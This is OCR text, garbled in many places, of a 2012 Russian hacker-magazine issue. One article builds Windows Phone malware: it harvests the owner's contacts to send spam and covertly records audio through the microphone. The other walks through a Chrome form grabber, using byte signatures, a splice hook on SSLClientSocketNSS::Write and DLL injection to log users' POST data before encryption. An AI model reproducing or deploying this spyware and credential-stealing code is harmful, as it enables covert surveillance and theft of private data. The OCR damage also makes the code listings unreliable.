МОБИЛЬНЫЙ СПАМ- ЗЛОБОДНЕВНАЯ ТЕМА : ]

Windows Phone nредоставляет nриложениям три способа раздельного хранения информации:

1.

Следующая про га , которую мы напишем, будет считыва ть имейлы

Изолированное хранилище для настроекзаnоминаеттекущее

состояние nриложения nри nереходе из одного режима его работы

в другой (исnользуется hаsh-таблица : параметр =значение) .

из списка контактов владельца смартфона и рассылать на них <щен­

н ую» информацию:). В отличие от предыдущей версии мобильной

2. Изолированное хранилище для файлов и nапок.

оси, в WP 7.5 контактные данные хранятс я в удобочитаемом в иде

З.

Локальная БД для реляционных данных служит для хране­

в локально й БД . К ним относятся не только номера телефонов

ния множества строго уnорядоченных свойств приложения ,

и адреса электронной почты , но и др уг ая информация о контактах,

к которым вnоследствии можно обратиться с nомощью заnроса

забитая пользователем , так что эа ним можно будет еще и по­

на LINQ, чтобы изъять и/или модифицировать данные .

шпионить. Эта БД предназначена только для чтения , поэтому тебе не удастся модифицирова ть данные или добавить новый контакт.

Пора начинать разработку. Создай новый WР-проект (об рати внимание , что операционная система имеет версию 7.5, а SDK-

Таким образом, у разработчика имеется широкий ассортимент средств для хранения данных , несмотря на отсутствие достуnа

к файловой системе устройства.

версию 7.1) на основе Silveгlight , перейди в файл С#-кода и добавь в начало ссылку на пространство имен Micгosoft.Phone.UseгData, обесnечивающее работу с пользовательскими данными. Не забудь также добавить указанное в прошлом разделе nространство имен

но будет возвращен в переменной класса CoпtactsSeaгchEve ntAгgs .,

для работы с мылом. Второе, что надо сделать, - это объявить

но вернется он только в событии SeaгchCompleted, обработчик

глобальную переменную класса Contacts, чтобы иметь доступ

которого надо зарегистрировать в функции MainPage:

к контактным данным юэера. Для инициализации nоиска мы вы­

зываем из функции MainPage функцию ln itSeaгch, которая в строчке

contacts.SeaгchAsync(Stгing. Empt y, FilteгKi nd. DisplayName, null)

contacts.SearchCompleted += new EventHandler< ContactsSearchEventArgs >(contacts_SearchCompleted)

производит асинхронный поиск по контактным данным . У функции

SeaгchAsync три пара метра: условие поиска (если этот параметр

Теперь опишем это событие:

пустой, то ищется всё); пара метр, по которому проводится выбор-

ка ( можно искать по имени, имейлу, номер у телефону или просто указать None, если параметр не важен, как в нашем случае); объект, в который помещается результат поиска, или nul l. Р езульта т всё рав-

void contacts_SearchCompleted(object sender, ContactsSearchEventArgs е) { int max = e.Results.Count(); // к ол-во конта ктов string adr; try { // во избежание падения nроги for ( int i = е ; i < max; i++) i f (e.Results.ElementAt(i).EmailAddresses != null) { adr = e.Results.ElementAt(i). EmailAddresses.First() . EmailAddress ; // берем мыло i f (adr !=_ null && adr != "" ) 11 если оно не равно нулю SendEmail(adr); // шлем мь~о : )

catch (Exception

ех)

{ }

} Из кода видно, что вначале мы берем общее количество найденны х контакто в, затем в цикле выбираем первый e-mail-aдpec каждого кон­

такта (у него может быть не одно мыло) и, если этот адрес не nустой , вызываем функцию SendEmail, которой п ередаем найденный адрес. Это очень простая функция:

void SendEmail(String adr) { EmailCompos!;Task email = new EmailComposeTask()_; email . То_ = adr; email. Subject = " Holy mail" ; email. Bqdy = "Down_load my prog" ; email. Show(); } Как всегда , подробно прокомментированный листинг ищи на ди ске

(проект EmaiiSeпder). Интерфейс Overhear2

ХАКЕР

03/158/ 2012


Малварь для мобильных <<око шек »

ПОДСЛУШИВАТЕЛЬ

микрофон относится к пространству имен

В прошлом разделе у нас с тобой был легкий расела бон, поэтому

xna,

он управляется со­

бытийным механизмом этого цикла:

давай напишем что-нибудь по еложнее и поинтереснее. Как следует

из заголовка раздела, следующая наша малварь будет слушать и со­ хранять все улавливаемые смартфоном звуки. Для ясности вкратце

DispatcherTimer dt ; new DispatcherTimer(); dt.Interval ; TimeSpan . FromМilliseconds( ЗЗ );

расскажу об алгоритме ее работы, как я его вижу. Ра зумеется, мы

пишем этот пример исключительно в исследовательских целя х!;]

Чтобы иметь возможность обрабатывать событие таймера, про­

После запуска· наше приложениена несколько секунд включает

исходящее через заданный промежуток времени, подписываемся

микрофон и записывает окружающие звуки в поток, затем выключа­

на событие: dt.Тick

ет микрофон и записывает поток в файл в изолированном хранили ­

команды dt.Staгtll запускаем таймер.

ще смартфона, после чего, наконец, загружает из этого хранилища

+; new EventHandler(dt_Тick). Затем с помощью

Второй таймер нужен для того, чтобы выключить микрофон,

файл и воспроизводит его. Результат мы узнаём только после

сохранить поток в файле и воспроизвести его. Таким образом, для

исполнения последовательности всех этих действий , поэтому кроме

инициализациивременного интервалатаймера нужендлительный

малвари я приготовил для тебя приложение (Оvегhеаг2 , ищи на дис­ ке], в котором каждая отдельная операция выполняется по нажатию

промежуток (например,

кнопки, чтобы ты мог подробней исследовать все эти операции.

конструктора инициализируем микрофон, вызывая самсписную

Если хочешь создать проект вместе со мной с нуля, сгенерируй

новый Silveгlight- проект для

WP.

10 000 мс], nлюс надо задатьдругую функцию

в качестве обработчика события, всё остальное то же самое. В конце

Пер ейди в начало файла С#- кода

функцию SetupMicгophone. Сначала она проверяет, чтобы дефолтны й

микрофон не был равен нулю. Если это по каким-то причинам не так,

и подключи следующие пространства имен:

т~делатьнечег~выхо дим .

using using using using using

возможность записывать аудио продолжительностью полсекунды.

Затем устанавливаем аудиобуфер микрофона, чтобы получить

System.IO; Microsoft.Xna.Framework; Microsoft.Xna.Framework.Audio; System.Windows.Threading; System.IO.IsolatedStorage;

Заполняем нулями объявленный ранее поток. После этого регистри­ руем событие, возникающее при заполнении буфера. Вызов функ­ ции WгiteWavHeadeг рассмотрим несколько позже, пока он для нас

не слишком важен . Наконец, с помощью строчки micгophone.Staгtll включаем микрофон на запись окружающих звуков. В последней

В первом из них находятся классы для работы с потоками и фай­

лами, во втором- FгamewoгkDispatcheг (если коротко, обработ­

строчке функции устанавливаем уровень громкости . Настала очередь события первого таймера , которое вызывается

чик циклических событий], в третьем, собственно, сам микрофон,

каждые

в четвертом -таймер для генерации циклических событий (ниже

при этом все происходящие исключения игнорируются. С момен-

33

миллисекунды . В нем только обновляе тся состояние,

рассмотрим, для чего он нужен], а в пят ом - средства для работы

та запуска программы и до тех пор, пока идет запись, переменная

с изолированным хранилищем. Дале е в автоматически сгенери­

гecoгdingStopped имеет нулевое значение. Когда истечет временной

рованном классе MaiпPage объявим глобальные переменные iсм.

интервал второго таймера и его событие будет сгенерировано, эта

исходник]. П ервая не представляет особого интереса, в ней просто

переменная примет истинное значение. При заполнении аудиобуфера

содержится имя файла для сохранения полученного звука и его по­

микрофона (это происходит примерно каждые 500 миллисекунд] вы­

следующего считывания. Во второй переменной объявляем микро­

зывается событие micгophone_BuffeгReady.

фон, которому сразу же присваиваем значение <<ПО умолчанию» в настоящее время все смартфоны с ОС

Windows Phone только одним микрофоном, поэтому выбор невелик :].

оснащаются

В нем данные извлекаются из аудиобуфера микрофона и записы­ ваются в поток. Е сли при этом переменная гecoгdingStopped принима­ ет истинное значение, значит, запись завершена, и нам необходимо

Затем объявляем переменную , к которой nривязывается nоток. В этом потоке сохраняются аудиоданные в течение сеанса

выключить микрофон и сохранить поток данных в файле. Возможно, ты задалея вопросом: почему мы не выключаем микро­

заnиси, перед сбросом в хранили ще . Массив байтов (следующая

фон непосредственно при генерации события второго таймера, а от­

переменная] используется для пром ежуточного хранения данных.

кладываем отключение до следующего заполнения буфера данных?

Когда вн утре нний буфер микрофона заполняется, данные из него

Это нужно для того, чтобы данные, имеющиеся в буфере к моменту

скидываются в этот массив, и только затем записываются в по-

возбуждения события тика таймера, были сохранены . Если бы мы

ток . Булевекая переменная гecoгdingStopped указывает действие,

сразу выключили микрофон, то данные, находящиеся в его буфере,

выполняемое в данный момент, то есть, если она равна нулю, идет

были бы уничтожены.

заnись (если микрофон еще включен], в nротивном случае осущест­

Функция SaveFilei] (см. листинг], вызываемая для сохранения фай­ ла, просто создает файл в изолированном хранилище и записывает

вляется воспроизведение.

В конструкторе класса объявим два таймера класса

в него весь поток с начала и до конца.

DispatcheгTimeг плюс инициализируем их временные значения .

Первый таймер нужен для имитации игрового цикла

xna.

Так как

private void SaveFile() {

/ /сох ранить файл

ЖИЗНЕННЫЙ ЦИКЛ ПРИЛОЖЕНИЯ В любой промежуток времени может выполняться

на другое, первое переводится в спящий режим

в течение жизненного цикла приложения с ним

одно приложение, и это очень важно- факт в том,

ldoгmaпt), но его текущее состояние сохраняется,

происходит от двух до четырех событий: событие

что это приложение lтеоретически) не сможет

чтобы при последующем запуске приложение

Lauпchiпg в момент запуска, Closiпg в момент

в фоне отправить эсэмэску на платный номер или

возобновило работу. Процесс захоронения

закрытия,

совершить другие злодеяния. Этотход позволяет

приложений

захоронении) и Activating при восстановлении

достигать наилучшей производительности, и

tombstoniпg. Если работающему приложению

из

не тратить заряд батареи на фоновые задачи. Когда

не хватает ресурсов, то ОС завершает (teгmiпate)

производится сохранение и восстановление

пользователь переключается с одного приложения

спящие приложения в порядке их запуска. В общем,

состояния приложений, можно обрабатывать .

ХАКЕР

03/158/ 2012

(active -> doгmaпt) получил название

Deactivating при деактивации (при

tombstone. Все эти события, в которых обычно

085


MALWARE using (IsolatedStorageFile isoStorage = IsolatedStorageFile . GetUserStoreForApplication()) { using (IsolatedStorageFileStream isoStream ~ isoStorage.CreateFile(FileName)) { isoStream . Write(stream . ToArray(), е, stream.ToArray().Length);

Однако если сохранить поток в таком виде, в каком он сейчас есть,

то его не откроет ни одна программа для воспроизведения . Чтобы привести сыро й поток данны х к понятному в иду, необходимо добавить заголовок . Таким образом, у нас получится wаv-файл. Е сли нужно получить файл другого типа, то над потоком данны х нужно дополни­

тельно поизвращаться

Разработка малвари

Overhear

:1. Но и чтобы получить простой wаv -фа йл, нам

необходимо знать формат полей заголовка. В своем благе швейцар­

ский программист Дамиан l goo.gl/ufeЗyl предлага ет замечательное решение, которое заключается в добавлении двух функций ! их код есть на странице) . Не вижу смысла им не воспользоваться! Функцию WriteWavHeader, которая создает начальные данные для заголовка, надо вызвать в начале записи lв нашем случае- в функ ­ ции SetupMicrophonel, а функцию UpdateWavHeade r, обновляющую

При использовании объекта изолированного хранилища он откры­ вается для чтения только после проверки того, существует ли вообще файл указанного имени. Звук из открытого файла воспроизводится с помощью объекта mediaSound. Воспроизведение начинается после привязки файлового потока к данному объекту и установки позиции, с которой надо начать проигрывание, и громкости звучания.

Кроме того, можно воспроизводить поток аудиоданных прямо

заголовочные данные, которые зависят от размера записываемого

из памяти. Для этого достаточно создать объект звукового эффекта

потока,- в конце записи, перед сбросом данных в файл !то есть

со следующими параметрами: звуковой поток в памяти, преобразован­

в функции microphone_BuffeгReady, после окончания записи, но перед

ный в массив байтов, частота звука !есть предопределенные значения)

вызовом SaveFilel. В результате в изолированном храни лищ е будет

и количество каналов звуковых данных !м оно или стереоl. Затем не­

сохранен полноценный wаv-файл. Последне е действие, выполняемое

обходимо вызвать метод Play данного объекта:

в обработчике события microphone_BufferReady !кроме обнуления переменной recordingStoppedl,- это вызов функции PlayFile для воспроизведения звука из сохраненного файла. Вот как выглядит эта функция:

private void PlayFile() . {. //воспроизвести сохра ненный файл using (var isf = IsolatedStorageFile.GetUserStoreForApplication()) i f (isf.FileExists(FileName)) { . using (var isoStream = isf.OpenFile(FileName, FileMode.Open, FileAccess.Read)) { mediaSound.Stop(); mediaSound.SetSource(isoStream); mediaSound.Position=System.TimeSpan.FromSeconds(e); mediaSound.Volume = 20; mediaSound.Play();

sound = new SoundEffect(stream.ToArray(), microphone.SampleRate, AudioChannels.Mono); sound. Play(); Вот и все возможности нашей мал вари! Тем не менее, имеются пла­ ны по ее развитию : к примеру, поскольку из ОС Windows Phone нельзя отправлять письма с вложениями, придется заливать файлы на какой­ нибудь сервер. Но этим мы займемся в будущем!

ЗАКЛЮЧЕНИЕ В статье мы провели обзор системы безопасности Windows Phone 7.5, рассмотрели возможные хаки и разработали собственную малварь.

WP- широко известная система, и в будущем она будеттолько набирать аудиторию. Так как система имеет мощные средства для обе­ спечения безопасности, а приложения в ней устанавливаются только

из Marketplace Hub !где подлежат обязательной модерации), у малвари практически нет возможности nоnасть на телефон. В то же время раз­ витие малвари не стоит на месте, nоэтому будем пристально следить

}

за дальнейшими событиями , а может быть, и при м ем в них участиеl :Х:

ВЫПОЛНЕНИЕ ПРИЛОЖЕНИЙ WP 7 предоставляетвыполняемому приложе­

и драйверы уровня ядра, следовательно,

выполняются драйвера пользовательского

нию изолированное пространство- камеру.

разработчики nрикладны х программ долж­

уровня .

Приложение, находящееся в этой камере,

ны избегать использования этого режима ,

не имеет доступа к данным других приложе­

особенно если они хотят разместить свое

дефолтный режим выполнения предуста­

ний. При этом существует четыре типа камер:

приложениена

новленных программ , таких как

1. The Trusted Computing Base (ТСВ)- база

поскольку выполняющееся на этом уровне

доверенного выполнения . На этом уровне выполненияприложениеснаивысшими

086

Windows Phone Marketplace,

приложениенепройдетпроверк~

2. The Elevated Rights Chamber (ERC)- каме­

3. The Standard Rights Chamber (SRC)MS Office Explorer 9 и т. д . 4. The Least Privileged Chamber (LPC)- уро­ MoЬile, lnteгпet

вень наименьших привилегий, дефолт­

привилегиями имеет доступ ко всем ресур­

ра повышенных прав . Здесь приложения

ный режим выполнения приложений

сам смартфона, включая фото- и видео­

имеют доступ ко всем ресурсам, кроме

не от

камеру, акселерометр и другие датчики.

стратегий безопасности, то есть к данным ,

предоставляются только те ресурсы, кото­

В этом режиме выполняется ядро системы

устройствам и датчикам. В этом режиме

рыезапрашиваются при инсталляции.

Microsoft. В этой камере приложению

ХАКЕР

03 / 158/ 201 2


Preview КОДИНГ ФОРМГРАББЕРДЛЯGООGLЕСНRОМЕ

088

Перехватформ-это наиболее востре­ бованнаятехнологиявтрояна~таккак именно с ее nомощью осуществляется

к р ажабольшейчасти личныхданных

J

nользователей. Формграббером для lnteгnet Ехрlогег и

Mozilla Fiгefox у же

никого не удивишь-такие решения

стары и общеизвестны. А вот граббинг для

Google Сhгоmе-это своего рода

эксклюзив, с которым ты сможешь разо­

браться, nрочитав эту статью. Д ело-то, как оказывается, нехитрое-нужно

лишь найти функцию, которая в качестве одного из nараметров nринимаетданные

формы внезашифрованном виде и nо­ ставить на нее хук.

КОДИНГ

UNIXOID

J)) И ЦЕЛОГО СИ МАЛО Приразработкехакерскихутилитчасто встречаются задачи, которые нереально

решитьсиламиобычногоnреnроцессора Си. В такой ситуации выручит Python!

ФЕДОРИНОСЧАСТЬЕ Последние версии д истрибутива Fedoгa выделяются несколькими интересными и

дажеинновационными изменениями. Но насколько они хороши?

SYN\ACK

11

В ПОИСКЕИНСАЙДЕРА Выявить и nредотвратить утечку кон­

фиденциальнойинформациисnособы DLР - системы. Мы решили nрове с ти не­

большой тест-драйвтаких решений.

ХАКЕР

03/158/201 2

11

ДОСТУЧАТЬСЯ ДО НЕБЕС Расширияемграницысоnрикосно в е н ия в е ба и обычного Linux-дecк т o n a, объеди н яя nривычную систе м у и

облач н ые сервисы.

FERRUM

11

ИСПЫТАНИЕ НАГРУЗКОЙ Какие инструменты и n одходы могут nомочь Djаngо-nриложению выдержать баснословные нагрузки? Ответ на во­ nрос - в этом материале.

ОТ«ВИНТА>>! Го н яем шесть вне ш нихжесткихдисков

в разных бе н чмарках . П ора опре д е­ лить, кто из них может похвас т а ть ся

максимальным быстро дейс т вием.

087


КОДИНГ

Сергей Сергеев [seseгegalagmail.гu, Ыotloгe.Ыogspot.coml

р

для

Google Chrome ИССЛЕДУЕМ ОТПРАВКУ ЗАШИФРОВАННЫХ ФОРМ И СПОСОБ ИХ ПЕРЕХВАТА В БРАУЗЕРЕ

OTGOOGLE

• qoo.qi/Cj4PI OllyDbg для

nлaгин

создания сигнатур

и масок .

аоо .аl/гdдlо -то

же самое, только

АЛЯ IDд .

• qoo.gl/ulqMb -интересная

ветка на форуме , nосвящённая

перехвату форм в Chгome .

• qoo.ql/sZWwZ о прологе и эnилоге .

Для генерации прологов и эпилогов я использовал

функцию без модификатора

_ declspec( naked), рассматривал её в дизассемблере и копировал начало и конец.

Перехват форм- это наиболее востребованная технология в банковских троянах, так как именно с ее помощью осуществляется кража большей части личных

данных пользователей. Формграббером для lnteгnet

Ехрlогег и

Mozilla

Fiгefox уже никого не удивишь- такие

решения стары и общеизвестны . А вот граббинг для

Google

Chгome- это пока эксклюзив, с которым мы

сегодня и разберемся .

088


Формграббер д ля

Google Chrome

~~----- -~ ~~~~~~-----

~~

Рис .

1. Сигнатурн ый

Н

n о иск в

Р и с.

OllyDbg

2. Поис к SSL- зa n poca

и чего сложного в перехвате нет, нужно лишь найти функ­

SRV*c:\code\symbols*http://msdl . microsoft.com/download/ symbols;SRV*c:\code\symbols* http://chromium- browsersymsrv.commondatastorage.googleapis.com

цию, которая в качестве одного из параметров принимает данные формы внеза ш ифрованном виде и поставить

на нее хук. В библиотекой

IE такая функция, HttpSendRequest, экспортируется wininet .dll, в Fiгefox это функция PR_Wгite из библи­

Здесь c:\code\symbols- папка, куда складываются закачанные

отеки пspг4.dll, а как я искал аналогичную функцию для Хрома, сейчас расскажу.

отладочные символы.

4.

Открыть несколько окон из меню View. Рекомендую открыть окна Commaпd, Registeгs и DisassemЬiy.

ИССЛЕДОВАНИЕ С перехватом незашифрованных форм в

Chгome нет ника­

Google

ких проблем, достаточно поставить хук на стандартную экспорти­

5. 6. 7.

Запустить Chгome. Открыть меню

File-7 Attach to а

Pгocess ...

Выбрать любой chгome.exe и нажать ОК.

руемую функцию WSASeпd. Сделать это довольно легко, и ма­ териала в интернете на эту тему предостаточно. П оэтому лучше

С помощью команды <<х chгome*!*SSLCiientSocketNSS: : Wгite>>

сосредоточиться на поиске функции, которая принимает данные

!которую надо вводить в окне Commaпdl я нашёл функцию

форм в SS L-соеди н ении еще д о шиф р ова н ия .

SSLC i ientSocke t NSS::Wгite, а потом и SS L CiientSocketWin::Wгite. П о­

Мои п оп ы тки найти подобную функцию с помощью закончились неудачей, поэтому я начал рыть в

Google

OllyDbg и сразу

наткнулся на страницу с полным исходным кодом браузера

ставил на них брейки lbгeakpointsl и зашёл в свой Gmаil-аккаунт. Программа прерывалась только на функции

SSLCiientSocketNSS

::Wгite.

lgoo .gi/8SgW2 , ведь Chгome - опенсорсный проект). Висходниках можно покопаться , указав в соответствующем поле формы поиска, что искать мы хотим в файлах С++ . П ервый запрос, который пришел м н е в голову,- это

«ssl socket>>.

В процессе поиска по э т ому запросу я сразу наткнулся на файл

ssl_socket .h lgoo.gl/6cw0w l, но ничего интересного в нём не на­

О nисани е фу нк ции,

на йден н о й в и с х од н ом к оде

int SSLClientSocketNSS: :Write( IOBuffer* buf, int buf_len, const CompletionCallback& cal l back

шел, зато в левой части экрана увидел дерево файлов с вкусными названиями. Меня интересовало всё , что имело в названии

·

ssl socket, а в особенности файлы ssl_clieпt_socket_nss . cc, ssl_ client_socket_openssl.cc и ssl_clieпt_socket_wiп.cc. Я знал, что

передается буфер с РОSТ-запросом. Л огично предположить, что

в Fiгefox перехватывается функция PR_Wгite, и решил поискать

в переменной с типом IOBuffeг:

и

Оставалось только выяснить, каким образом этой функции

и ее. В результате на первой же из появившихся двух страниц оказался файл

ssl_client_socket_nss.cc.

Саму функцию я в нем так

и не нашёл, однако теперь знал, откуда она вызывается.

class NET_EXPORT IOBuffer : puЫic base: :RefCountedThreadSafe<IOBuffer>

Просмотрев листинг, я наткнулся на функцию SSLCiientSocketWin::Wгite, чем-то напоминающую PR_Wгite. В дру­

puЫic :

гих фай л ах, п еречисленных выше, на шлись аналогичные функции:

IOBuffer(); explicit IOBuffer( int buffer_size); char * data() { return data_; } protected : friend class base: :RefCountedThreadSafe<IOBuffer>; explicit IOBuffer( char * data); virtual -IOBuffer(); char * data_; };

SSLCiientSocketOpenSSL: : Wгite и SSLCiieпtSocketWin::Wгite. Следо­ вало их проверить.

Для этого требовался отладчик и адреса функций. Я восполь­ зовался официальной инструкцией по настройке и отладке

Google

Chгome, которая лежит по адресу goo.gl/fwt1S . Е сли вкратце, то для отладки Хрома нужно сделать следую­ щее:

1. 2. 3.

Запустить WinDBG . Открыть меню

File -7 Symbol File Path.

Вставить в появившееся окошко следующую строку:

ХАКЕР 03/158/201 2

Так как структура сложная и непонятно, какое в действительно-

089


КОДИНГ

EIP 0287SR4C chroNe_1.0287SR4C С 0 ES ае23 32Ьi t et FFFFFFFF! Р 0 CS eet В 32Ьi t et FFFFFFFF! ~ 0 SS е023 32Ьi t 0( FFFFFFFF!

2 0 S е

Т е о е о е

ST0 ST1

ST2

OS 0023 32Ь 1t FS е03В Э2Ьi t GS ее0е NULL

е 1FFFFFFFF 1 7FF~F000(

FFF!

емрtу

et<~Ot~ емрtу

SТЗ er>IPtY

ST4 er'loty

STS ST6 ST7

Рис.

емоtу емрtу емрtу

3. SSL-зanpoc найден

сти смещение у данных, мне пришлось искать указатель на массив

Здесь-то мы и будем программно искать адрес нашей неэкспорти­

символов вручную. Для этого я в уже привычном

OllyDbg поставил брейк на функцию SSLCiientSocketNSS: : Wгite lсм. рис 11, при оста­

руемой функции.

новке взял первый параметр из стека и начал перебирать в нём

сигнатурный поиск . Сигнатурой функции !последовательностью байтов, по которой будет осуществляться поиск! выступят первые

каждый DWORD iсм. рис 21. Выяснил ось, что третий DWORD !то есть 10Buffeг+81 представ­ ляет собой указатель на массив символов ichaг*l, содержащий

Оптимальным способом для этого в данном случае я считаю

14

байт функции, они уникальны для модуля chгome.dll и однознач­

но указывают на нашу цель.

НТТРS-запрос iсм. рис 31. Далее в процессе отладки я обнаружил, что заголовок

POST-

зanpoca и его данные передаются функции друг за другом, в от­ дельных вызовах. Это легко nонять, если установить условный

брейк на функцию SSLCiientSocketNSS::Wгite lсм. рис вызывается функция и в буфере находится строка

41. Сначала «POST ... >>,а сле­

дующий вызов уже содержит данные формы. Мы это обязательно учтем.

ПОИСК АДРЕСА Теперь можно приступать к разработке, то есть к написанию модуля , который будет перехватывать найденную ранее функцию.

дизас1-1 начаJJЫ!РЙ .част.и

nерехватt,~ваемой функции

chrome_lcзeeee!

net: : SSLClientSoc.ketNSS: : Wri te: 02875а4с 55 push еЬр 02875a4d ВЬ.ес mov еЬр, esp 02875a4f 51 push есх. 02875а50 53 push еЬх 02875а51 56 push esi 02875а52 57 push edi 02875а5) . ff7508 push dword ptr [ еЬр+ 8 ] 02875а56 Bbfl mov esi.ecx 02875а58 ЗЗdЬ xo r еЬх,еЬх

Тут следует задуматься, как найти ее адрес программно, ведь она не экспортируется, а значит, обычным GetPгocAddгess здесь

Скопируем первые байты функции и преобразуем их в массив

байтов IBYTE*I, который функция поиска сигнатуры принимает

не обойтись . В процессе Хрома есть два РЕ-модуля, которые потен­

в качестве параметра вместе с маской сигнатуры, хзндлом и раз­

циально могут содержать нашу функцию,- это chгome.exe

мером модуля. Маска служит для вычленения релятивных и абсо­

и chгome.dll. Отладчик нам любезно сообщает, что адрес

лютных адресов в сигнатуре, потому как они могут меняться при

SSLCiieпtSocketNSS::Wгite как раз лежит в пределах

каждом запуске. Байты адресов помечаются знаком«?,,, осталь­

dll . Что

говорить, в ней вообще находится большая часть кода браузера.

090

ные байты- знаком <<Х>>.

ХАКЕР

03 / 158/ 201 2


Формграббер для Google Chгome

i f (DataCompare((BYTE *)(dwAddress+ i),pbMask,szMask)) return (DWORD)( dwAddress + i ); return

е;

Кто-то может сказать, что этот метод is f*cking unstaЫe. Однако прошло полгода, вер сия Хрома н ео дн ократно менялась, а сигна т у­

ра всё ещё ра ботает.

ПЕРЕХВАТ ОК , мы нашли а дре с функции, теnерь её нужно nерехватить. Для этого nодойдёт банальный сnлайсинг. Д ля те х, кто в танке, сnлай­ си н г- это метод nерехвата функции, основанный на модификации Рис .

4. Условный брейк на SSLCiientSocketNSS::Write

ее кода. Самый nростой вариант реализовать с nл айси нг- за­ менить, предварительно сохранив, nервые

5 байт

nерехватывае­

мой функции на «JMP твоя_функция » . Д ля вызова оригина льн ой

Вызов функции пои ска осуществляется следующим образом:

функции в этом с л учае нужно в осстано вить э ти

5 байт из

бу фера ,

а после вызова снова изменить на JM P. У этого метода есть суще ­

char * Sign = "\x55\xBB\xEC\x51\x53\x56\x57\xFF\x75\xeв \xBB\xFl\xЗЗ\xDB" ; // Сигнатура SSLClientSocketNSS :: Write

ственный недостаток. Дело в том, что если после восстановления начальной части оригинальной функции контекст переключится на др угой поток, то он сможе т вызвать функцию, минуя наш хук.

char * Mask= "xxxxxxxxxxxxxx" ; // маска DWORD SSLAdr = FindPattern(ChromeDLL, Chrome32Size, (BYTE*)Sign, Mask); /1 SSLAdr - адрес SSLClientSocketNSS: :Write

Есть и др угой способ сплайсинга - с так называемым «т рам­

пл ином>>. Как и в предыдущем способе, в нем в начало функции также встраивается

JMP на хук, но на этом сходство заканчива­

ется . Для вызова оригинальной функ ц ии при т аком сплайсинге её начальная часть не во сста навливается . Этот способ не об ладает указанным недостатком.

При ус тановке пере х вата просто создается буферс пр авами

Сама функция выглядит так:

bool DataCompare( const ВУТЕ * pData, const ВУТЕ * bMask, const char * szMask

PAGE_EX ECUT E [устанавли в аются с помощью ViгtuaiPгotect], в который копи р уются первые 5 [размер д жампа] или более байт из начала функции . Размер джампа может превышать 5 байт, та к как нам нужно скопировать аsm - инструкции целиком, чтобы они

for ( ; * szMask; ++szMask, ++pData, ++bMask

смогли выполняться в другом месте. Чт обы о пр еде лить , сколько в точности байтов копировать и где граница очередной инструк­

{ i f ( * szMask == 'х' return false ;

&&

* pData != * bMas k )

ции, в нормальных сплайсинг-движках обычно используется д изассемб л е р длины . Так вот, в конец буфера со скопированными инст р укциями д о­

return ( *s zMask ) == NULL;

писывается JMP, ведущий на [адрес функции+ сумма дл ин первых инструкций]. Таким образом, для вызова о риг и н альной функции достаточно выполнить «JMP а др ес_буфера>> .

DWORD FindPattern _( DWORD dwAddress, DWORD dwSize, ВУТЕ * pbMask, char * szMask

Несмотря на то что второй способ значительно стабильнее, в процессе исследований я реализовал первый способ, та к как он

проще [код смо три н а диске] .

for ( DWORD i = NULL; i < dwSize; i++ )

{

Функция-перехватчик, записывающая формы в файл, для него выглядит так :

АЛЬТЕРНАТИВНЫЕ ПУТИ ПЕРЕХВАТА Существуют и другие пути достижения нашей цели. Например,

один из участников форума

От себя могу добавить, что можно подменять PR_Wгite в таблице

методов , поскольку адрес этой функции берется из таблицы comblпed_

openws под ником akademikeг nредложил лерехватывать функцию PR_Wгite ly него получилось-таки ее найти],

methods,

что nозволяет без особых усилий адаптировать nод Chгome исходники

в WiпDBG при трассировке функции SSLCiieпtSocketNSS :: DoPayload

Zeus !само собой, в исследовательских целях].

Wгite lсм. рис 5] . При использовании этого слоеоба исполняемый код

Сигнатура для nоиска

детектирования перехватов . Чтобы его реализовать, нужно получить

что не отражается в исходниках, зато отчётливо проявляется

не модифицируется, что позволяет обмануть некоторые механизмы

/1

PR_Write

сигнатура

адрес таблицы comblпed_methods и заменить в нем адрес PR_Wгite

char * Sigп = "\хВЬ\х4с\х24\хе4\х57\хеВ\хее\хее\хее\хее\хВЬ

по смещению

\xf8\x85\xff\x75\xeS\x83\xc8\xff\x5f\xc3\x53\x56\x8b\xЫ

друг о й метод перехвата , отличающийся от всех предыдущих . Он

\хЗВ\хе2\хее\хее" ;

перехватывает TгanslateMessage , nозволяя следить за тем, что вводит

11

пользователь с клавиатуры , а также функцию

маска

char * Mask= " xxxxxx????xxxxxxxxxxxxxxxxxxx " ;

OCh на адрес своей функции . SpyEye использует

ZwReadFile, которая

выдаёт адреса посещаемых сайтов и запросы к ним !подробнее читай на goo .gl/xTX9j] . В общем , есть из чего выбрать .

ХАКЕР

03/158/2012

091


КОДИНГ

leave ret :SSLClientSocketNSS: :DoPayloadWrite : mov sub and push push mov mov mov mov mov push push call Рис .

ebp , esp esp,OCh dword ptr [ebp-OCh],O es1 edi edi,ea:к ea:к,dword ed:к , dword ec:к , dword еа:к dword

ptr ptr ptr tr

edi+ODOh] edi+OD4h] еа:к+В]

edi+l.A.Ch

I

ее :к

е а :к

dword

5. Comblned_methods в SSLCiientSocketNSS:: DoPayloadWrite

__declspec ( naked ) int Hooked_SSLWrite( DWORD buf, int buf_len, void * callback)

Writelog(LogFile,*( char**)(buf+B)); IsPostData=true ; else if ((strncmp(( LPCSTR)*( char**)(buf+S), "GET" , l strlen( "GET" ))==B) 11 IsPostData)

static bool IsPostData; Writelog( LogFile,*( char**)(buf+8)); IsPostData=false ;

__ asm push еЬр; mov ebp,esp; push еЬх; push esi; push edi; push ecx; //argument

__asm рор

еах;

рор

edi; esi;

рор

рор еЬх;

leave ; ret ech ;

/ 1 Восстанавливаем начальную часть /1 ори ги нальной функции ChromeHook.UnsetSplicing(); TrueSSLWrite = (SSLWrite)ChromeHook . GetHookedFunc();

Модификатор

11 Вызов _asm

оригинальной функции

{

__ declspec[naked]

в данном случае исnользу­

ется nотому, что один из nараметров передается не через стек,

а через регистр есх. Это значит, что нам следует сохранить его, прежде чем он изменится, и восстановить до вызова оригиналь­

ecx; // argument mov eax,callback; push еах; mov eax,buf_len; push еах; mov eax,buf; push еах; call TrueSSLWrite; push еах; рор

ной функции.

Ничего удивительного в подобной nередаче параметров нет- это так называемый

thiscall,

исnользуемый для вызова

методов класса [ведь наша функция представляет собой метод Wгite класса

SSLCiientSocketNSS].

Через регистр есх таким

образом nередается адрес объекта, для которо г о вызывается метод.

ЗАКЛЮЧЕНИЕ Остается только внедрить код-перехватчик в процесс браузера

[я исnользовал классическое DLL-инжектирование] - и готово!

11

Возвращаем сnлайсинг

ChromeHook.ReSplice();

Однако у

Google

Chгome много процессов, а перехватывать функ­

ции нужно строго в оnределенном, имеющем визуальную форму с названием активной вкладки. В других nроцессах функция

if ((strncmp((LPCSTR)*( char**)(buf+8), "POST" ,lstrlen( "POST" ))==8))

